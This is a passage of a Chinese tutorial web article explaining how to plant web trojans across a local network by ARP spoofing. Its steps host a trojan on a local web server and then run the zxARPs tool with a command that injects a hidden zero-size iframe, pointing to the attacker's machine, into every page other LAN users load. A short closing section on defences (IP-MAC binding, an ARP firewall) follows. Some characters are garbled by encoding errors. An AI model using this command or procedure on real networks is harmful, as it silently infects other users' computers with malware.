局域網(wǎng)ARP欺騙掛馬方式詳細講解
您當前位置:首頁 > 紅訊頻道 > 網(wǎng)絡(luò)技術(shù)
紅軟基地 推薦
2012-01-20
第三步:開啟本機Http服務(wù)
要讓局域網(wǎng)中的其他主機能夠訪問到我們的網(wǎng)馬,就要開啟本機的Http服務(wù)。下載baby web server,這是一款簡單的Web服務(wù)器軟件,下載后直接運行,在其主界面中點擊“服務(wù)→設(shè)置”。
將“網(wǎng)頁目錄”設(shè)置為網(wǎng)頁木馬所在的地方,例如C盤根目錄“C:/“。點“確定”回主界面,然后再點“Start”按鈕開啟本機的Http服務(wù)(圖3)。記得要將木馬服務(wù)端和網(wǎng)頁木馬放到C盤根目錄。
按鈕開啟本機的Http服務(wù)
第四步:局域網(wǎng)掛馬
最后該請我們的主角出場了,就是上文中提到的小工具,這個工具叫zxARPs,是一個通過ARP欺騙實現(xiàn)局域網(wǎng)掛馬的工具。在使用zxARPs前我們要安裝WinPcap,它是網(wǎng)絡(luò)底層驅(qū)動包,沒有它zxARPs就運行不了。
安裝好后將zxARPs放到任意目錄,然后運行“命令提示符”,進入zxARPs所在的目錄,然后輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src="http://192.168.0.2/hackll.htm" width="0" height="0"></iframe>
安裝好后將zxARPs放到任意目錄,然后運行“命令提示符”,進入zxARPs所在的目錄,然后輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src='http://192.168.0.2/hackll.htm' width=0 height=0>";剀嚭髵祚R就成功了。
從現(xiàn)在開始,局域網(wǎng)中的用戶無論訪問什么網(wǎng)站,都會運行我們的網(wǎng)頁木馬,因為zxARPs在用戶打開網(wǎng)頁的同時已經(jīng)將掛馬代碼插入到正常網(wǎng)頁中了。
ARP掛馬防范技巧
從上文可見zxARPs的功能真的十分強大,但它畢竟是基于ARP欺騙原理的,只要局域網(wǎng)內(nèi)的主機能夠抵御ARP欺騙攻擊,就可以完全無視zxARPs的掛馬方法。
網(wǎng)管將局域網(wǎng)內(nèi)所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載“360ARP防火墻”來抵御ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft),安裝完成后點擊界面上的“開啟”按鈕就可以讓它保護我們免受ARP欺騙的攻擊了(圖4)。這時如果有人對你的主機進行ARP欺騙攻擊,我們在可以點擊“記錄”按鈕,查看攻擊者的IP地址。
開啟ARP保護
編輯點評:ARP欺騙可以實現(xiàn)多種攻擊效果,本文介紹ARP欺騙掛馬的只是其中的一種攻擊方式,此外還有信息嗅探,主機網(wǎng)絡(luò)限制等攻擊方法?梢,ARP欺騙是局域網(wǎng)的頭號大敵。因此我們在平時的安全防范中,不僅要做好本機的安全工作,還要對局域網(wǎng)的安全作一定的防御,這樣才能更安全地使用電腦
來源:紅訊頻道